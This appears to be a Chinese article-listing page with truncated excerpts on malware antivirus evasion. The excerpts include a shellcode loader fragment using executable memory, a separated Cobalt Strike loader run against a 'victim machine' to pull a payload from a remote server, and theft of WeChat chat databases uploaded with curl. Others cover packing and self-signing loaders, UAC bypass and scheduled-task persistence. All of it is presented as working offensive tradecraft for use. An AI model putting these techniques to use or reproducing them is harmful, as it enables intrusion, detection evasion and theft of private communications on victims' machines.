共 100 篇文章 |
|
shellcode加载代码如下所示:#include <Windows.h>unsigned char shellcode[] ='''''''''''''''';void CallBack() { void* p = VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT, PAGE_EXECUTE_READWRITE); memcpy(p, shellcode, sizeof(shellcode)); EnumUILanguage... 阅15 转0 评0 公众公开 24-04-14 15:52 |
wxid_xxxxxxxx\Msg\Multi\MSG0.db >聊天记录wxid_xxxxxxxx\Msg\Multi\MSG1.db >聊天记录wxid_xxxxxxxx\Msg\Multi\MSG2.db >聊天记录wxid_xxxxxxxx\Msg\MicroMsg.db >Contact字段 >好友列表wxid_xxxxxxxx\Msg\MediaMsg.db >语音 >格式为silk.https://github.com/c1y2m3/FileSearch服务端接收文件使用curl将打包压缩的文件... 阅18 转0 评0 公众公开 24-04-10 08:10 |
CS木马分离免杀实操(过360,火狐和WindowsDefinder)木马加载器和payload载荷分开,仅仅上传制作的好的加载器即可,通过对加载器的控制,使其加载放置在远程服务器上的木马。3. 加载器的准备:使用命令(文件muma.cpp,文章底部链接下载即可):x86_64-w64-mingw32-g++ –static -o power.exe muma.cpp -fpermissive -lws2_32 生成 power.exe ... 阅32 转0 评0 公众公开 24-04-08 09:02 |
文章开头,上次写的免杀生成脚本,存在一个致命问题,那就是识别main加载器,这次更改特征,增加随机字符串函数,每次的打包命令都不一样,可变相的绕过杀软。以此类推,在最后文件去import加载器,会达到绕过杀软的机制。随机数函数python已经有了,因只有数字,可能不会很强大,写一个随机a-f函数。测试上线,记住,需要运行lnfti0.py.lnfti0... 阅16 转0 评0 公众公开 24-04-06 23:51 |
[新型编码最强免杀]可过大部分杀软。网上分离免杀已经大部分不能用了,在此基础上进行五层AES加密,发现也不行,然后自己编写测试出''''''''玛卡巴卡编码'''''''',该编码并未公开,所以不在识别库在运行的过程中为了绕过部分杀软检测会进行1亿次函数跳转和10亿次if-else判断... 阅36 转0 评0 公众公开 24-04-06 23:51 |
CS木马分离免杀实操(过360,火狐和WindowsDefinder)(4月2日更新)分离免杀:木马加载器和payload载荷分开,仅仅上传制作的好的加载器即可,通过对加载器的控制,使其加载放置在远程服务器上的木马。4. 免杀测试:将加载器power.exe 上传至 受害机后,开启各类EDR,尝试上线CS,命令:power.exe 192.168.1.220 8880 payload_x64.bin ,CS成功上... 阅10 转1 评0 公众公开 24-04-04 18:01 |
红队攻防之exe文件签名免杀。2、使用 cobaltstrike分离免杀工具生成loader.exe文件。3、使用UPX对生成的exe文件进行加壳,加壳前后对比文件的大小。4、对loader.exe进行制作并签发证书-数字签名。(2)、使用makecert命令制作证书,sv-私钥文件名,ss-主题的证书存储名称,n-证书颁发对象,r-证书存储位置,输入私钥密码。(3)、注册证书与签... 阅10 转0 评0 公众公开 24-03-25 07:04 |
一个简单好用的内网渗透免杀工具。工具简介。更改payload.ini下的加载路径,加载不同的功能,比如mimikatz免杀defender免杀360除了内存执行config下的固定功能外,还可以使用cs或者msf生成payload.bin(注意需要x86)进行加载上线。2023-8-07 更新 bypassUAC功能 使用方法:将payload.ini里的配置改为./config/BypassUAC.dat 运行BypassUAC.exe20... 阅47 转0 评0 公众公开 23-12-14 14:21 |
基于python的火绒、360、defender免杀shellcode loader.shellcode loader,bypassav,免杀,一款基于python的shellcode免杀加载器evilhiding v1.1.将shellcode和即将生成的a.txt的url填入main.pyshellcode=b''''''''''''''''url='''''''''... 阅107 转1 评0 公众公开 23-11-27 18:43 |
//设置计划任务名称 //创建ITaskService的实例 ITaskService* pService = NULL; hr = CoCreateInstance(CLSID_TaskScheduler, NULL, CLSCTX_INPROC_SERVER, IID_ITaskService, (void**)&pService); // 链接到任务实例 hr = pService->Connect(_variant_t(), _variant_t(), _variant_t(), _variant_t()); // 获取指向根任务文件夹的指针。 阅26 转0 评0 公众公开 23-11-01 07:00 |